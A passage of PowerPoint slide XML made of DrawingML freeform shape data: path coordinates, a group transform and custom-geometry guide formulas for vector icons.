                    <a:pt x="2866" y="5591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2813" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2813" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2798" y="5633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750" y="5633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2729" y="5649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="5670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2714" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2714" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2714" y="5707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="5722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="5722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646" y="5775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656" y="5785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2729" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2729" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750" y="5754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="5759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2803" y="5754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2824" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2834" y="5717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="5691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="5675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2829" y="5659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2829" y="5659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2893" y="5607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2945" y="5554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997" y="5497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160" y="5450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3491" y="5455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3591" y="5450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3680" y="5434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3842" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3842" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="5402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3879" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3858" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3805" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3753" y="5554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3695" y="5597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3580" y="5675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3517" y="5707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3449" y="5738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386" y="5765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="5791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3249" y="5812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3176" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3102" y="5843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3029" y="5854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2803" y="5859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2724" y="5854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646" y="5843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="5806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2320" y="5744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2241" y="5707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162" y="5665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089" y="5618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2021" y="5565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1900" y="5460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721" y="5245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1680" y="5187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1648" y="5124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1617" y="5061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1585" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1559" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1537" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1517" y="4793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1507" y="4720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1490" y="4646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1485" y="4573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1485" y="4332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1501" y="4211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1527" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564" y="3969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564" y="3969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1596" y="3895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="3827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1669" y="3759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1753" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805" y="3565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="3507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911" y="3449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968" y="3397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="3350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2094" y="3302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2157" y="3260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2231" y="3218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299" y="3187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372" y="3155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2756" y="3066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="3061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="3061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971" y="3061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3060" y="3071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144" y="3087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3396" y="3160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3475" y="3192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3632" y="3281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3706" y="3334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="3391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3848" y="3449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="3517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3974" y="3586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4026" y="3659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4079" y="3738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4126" y="3817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4163" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4199" y="3990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4226" y="4079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4247" y="4168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4268" y="4263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4273" y="4362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4273" y="4562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4263" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4247" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4278" y="4468"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4252" y="4426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4215" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173" y="4342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4205" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4278" y="4468"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1564" y="3969"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1564" y="3969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1574" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1590" y="4016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1611" y="4032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1596" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1580" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564" y="396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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="104" name="Group 103"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-18431" y="6295336"/>
              <a:ext cx="2629525" cy="2582541"/>
              <a:chOff x="-76702" y="1304314"/>
              <a:chExt cx="2629525" cy="2582541"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="136" name="Freeform 4"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-76702" y="1304314"/>
                <a:ext cx="2629525" cy="2200406"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2194 w 7403"/>
                  <a:gd name="T1" fmla="*/ 0 h 6195"/>
                  <a:gd name="T2" fmla="*/ 2162 w 7403"/>
                  <a:gd name="T3" fmla="*/ 215 h 6195"/>
                  <a:gd name="T4" fmla="*/ 2121 w 7403"/>
                  <a:gd name="T5" fmla="*/ 425 h 6195"/>
                  <a:gd name="T6" fmla="*/ 2052 w 7403"/>
                  <a:gd name="T7" fmla="*/ 629 h 6195"/>
                  <a:gd name="T8" fmla="*/ 1974 w 7403"/>
                  <a:gd name="T9" fmla="*/ 819 h 6195"/>
                  <a:gd name="T10" fmla="*/ 1874 w 7403"/>
                  <a:gd name="T11" fmla="*/ 1008 h 6195"/>
                  <a:gd name="T12" fmla="*/ 1764 w 7403"/>
                  <a:gd name="T13" fmla="*/ 1181 h 6195"/>
                  <a:gd name="T14" fmla="*/ 1637 w 7403"/>
                  <a:gd name="T15" fmla="*/ 1343 h 6195"/>
                  <a:gd name="T16" fmla="*/ 1496 w 7403"/>
                  <a:gd name="T17" fmla="*/ 1496 h 6195"/>
                  <a:gd name="T18" fmla="*/ 1343 w 7403"/>
                  <a:gd name="T19" fmla="*/ 1637 h 6195"/>
                  <a:gd name="T20" fmla="*/ 1181 w 7403"/>
                  <a:gd name="T21" fmla="*/ 1764 h 6195"/>
                  <a:gd name="T22" fmla="*/ 1008 w 7403"/>
                  <a:gd name="T23" fmla="*/ 1874 h 6195"/>
                  <a:gd name="T24" fmla="*/ 819 w 7403"/>
                  <a:gd name="T25" fmla="*/ 1974 h 6195"/>
                  <a:gd name="T26" fmla="*/ 629 w 7403"/>
                  <a:gd name="T27" fmla="*/ 2052 h 6195"/>
                  <a:gd name="T28" fmla="*/ 425 w 7403"/>
                  <a:gd name="T29" fmla="*/ 2121 h 6195"/>
                  <a:gd name="T30" fmla="*/ 215 w 7403"/>
                  <a:gd name="T31" fmla="*/ 2162 h 6195"/>
                  <a:gd name="T32" fmla="*/ 0 w 7403"/>
                  <a:gd name="T33" fmla="*/ 2194 h 6195"/>
                  <a:gd name="T34" fmla="*/ 0 w 7403"/>
                  <a:gd name="T35" fmla="*/ 6194 h 6195"/>
                  <a:gd name="T36" fmla="*/ 551 w 7403"/>
                  <a:gd name="T37" fmla="*/ 6158 h 6195"/>
                  <a:gd name="T38" fmla="*/ 1086 w 7403"/>
                  <a:gd name="T39" fmla="*/ 6069 h 6195"/>
                  <a:gd name="T40" fmla="*/ 1606 w 7403"/>
                  <a:gd name="T41" fmla="*/ 5943 h 6195"/>
                  <a:gd name="T42" fmla="*/ 2110 w 7403"/>
                  <a:gd name="T43" fmla="*/ 5769 h 6195"/>
                  <a:gd name="T44" fmla="*/ 2593 w 7403"/>
                  <a:gd name="T45" fmla="*/ 5559 h 6195"/>
                  <a:gd name="T46" fmla="*/ 3050 w 7403"/>
                  <a:gd name="T47" fmla="*/ 5312 h 6195"/>
                  <a:gd name="T48" fmla="*/ 3491 w 7403"/>
                  <a:gd name="T49" fmla="*/ 5029 h 6195"/>
                  <a:gd name="T50" fmla="*/ 3900 w 7403"/>
                  <a:gd name="T51" fmla="*/ 4714 h 6195"/>
                  <a:gd name="T52" fmla="*/ 4289 w 7403"/>
                  <a:gd name="T53" fmla="*/ 4367 h 6195"/>
                  <a:gd name="T54" fmla="*/ 4640 w 7403"/>
                  <a:gd name="T55" fmla="*/ 3989 h 6195"/>
                  <a:gd name="T56" fmla="*/ 4966 w 7403"/>
                  <a:gd name="T57" fmla="*/ 3580 h 6195"/>
                  <a:gd name="T58" fmla="*/ 5255 w 7403"/>
                  <a:gd name="T59" fmla="*/ 3150 h 6195"/>
                  <a:gd name="T60" fmla="*/ 5512 w 7403"/>
                  <a:gd name="T61" fmla="*/ 2693 h 6195"/>
                  <a:gd name="T62" fmla="*/ 5732 w 7403"/>
                  <a:gd name="T63" fmla="*/ 2215 h 6195"/>
                  <a:gd name="T64" fmla="*/ 5911 w 7403"/>
                  <a:gd name="T65" fmla="*/ 1716 h 6195"/>
                  <a:gd name="T66" fmla="*/ 6047 w 7403"/>
                  <a:gd name="T67" fmla="*/ 1202 h 6195"/>
                  <a:gd name="T68" fmla="*/ 7402 w 7403"/>
                  <a:gd name="T69" fmla="*/ 0 h 6195"/>
                  <a:gd name="T70" fmla="*/ 3969 w 7403"/>
                  <a:gd name="T71" fmla="*/ 3040 h 6195"/>
                  <a:gd name="T72" fmla="*/ 3669 w 7403"/>
                  <a:gd name="T73" fmla="*/ 4236 h 6195"/>
                  <a:gd name="T74" fmla="*/ 3370 w 7403"/>
                  <a:gd name="T75" fmla="*/ 3338 h 6195"/>
                  <a:gd name="T76" fmla="*/ 3066 w 7403"/>
                  <a:gd name="T77" fmla="*/ 4236 h 6195"/>
                  <a:gd name="T78" fmla="*/ 2766 w 7403"/>
                  <a:gd name="T79" fmla="*/ 3338 h 6195"/>
                  <a:gd name="T80" fmla="*/ 2467 w 7403"/>
                  <a:gd name="T81" fmla="*/ 4236 h 6195"/>
                  <a:gd name="T82" fmla="*/ 2168 w 7403"/>
                  <a:gd name="T83" fmla="*/ 3040 h 6195"/>
                  <a:gd name="T84" fmla="*/ 1868 w 7403"/>
                  <a:gd name="T85" fmla="*/ 1837 h 6195"/>
                  <a:gd name="T86" fmla="*/ 2168 w 7403"/>
                  <a:gd name="T87" fmla="*/ 1537 h 6195"/>
                  <a:gd name="T88" fmla="*/ 3669 w 7403"/>
                  <a:gd name="T89" fmla="*/ 1837 h 6195"/>
                  <a:gd name="T90" fmla="*/ 3969 w 7403"/>
                  <a:gd name="T91" fmla="*/ 3040 h 6195"/>
                  <a:gd name="T92" fmla="*/ 6499 w 7403"/>
                  <a:gd name="T93" fmla="*/ 598 h 6195"/>
                  <a:gd name="T94" fmla="*/ 7202 w 7403"/>
                  <a:gd name="T95" fmla="*/ 1002 h 6195"/>
                  <a:gd name="T96" fmla="*/ 2168 w 7403"/>
                  <a:gd name="T97" fmla="*/ 2435 h 6195"/>
                  <a:gd name="T98" fmla="*/ 2766 w 7403"/>
                  <a:gd name="T99" fmla="*/ 3040 h 6195"/>
                  <a:gd name="T100" fmla="*/ 3066 w 7403"/>
                  <a:gd name="T101" fmla="*/ 2435 h 6195"/>
                  <a:gd name="T102" fmla="*/ 3669 w 7403"/>
                  <a:gd name="T103" fmla="*/ 3040 h 6195"/>
                  <a:gd name="T104" fmla="*/ 3066 w 7403"/>
                  <a:gd name="T105" fmla="*/ 2435 h 6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7403" h="6195">
                    <a:moveTo>
                      <a:pt x="2194" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2194" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2178" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2162" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2141" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2121" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2089" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2052" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2015" y="724"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1974" y="819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1926" y="913"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1874" y="1008"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1821" y="1096"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1764" y="1181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1701" y="1265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1637" y="1343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1569" y="1422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1496" y="1496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1422" y="1569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1343" y="1637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1265" y="1701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1181" y="1764"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1096" y="1821"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1008" y="1874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="913" y="1926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="819" y="1974"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="2015"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="2052"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="2089"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="2121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="2141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="2162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="2178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="6184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="6158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="819" y="6121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1086" y="6069"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1349" y="6011"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1606" y="5943"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1858" y="5864"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2110" y="5769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2352" y="5669"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2593" y="5559"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2824" y="5444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3050" y="5312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3275" y="5176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3491" y="5029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3701" y="4877"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3900" y="4714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4100" y="4546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4289" y="4367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4467" y="4179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4640" y="3989"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4808" y="3785"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4966" y="3580"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5113" y="3370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5255" y="3150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5391" y="2923"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5512" y="2693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5628" y="2456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5732" y="2215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5827" y="1968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5911" y="1716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5985" y="1459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6047" y="1202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7402" y="1202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7402" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2194" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="3969" y="3040"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3669" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3669" y="4236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3370" y="4236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3370" y="3338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3066" y="3338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3066" y="4236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2766" y="4236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2766" y="3338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2467" y="3338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2467" y="4236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2168" y="4236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2168" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1868" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1868" y="1837"/>
                    </a:lnTo>
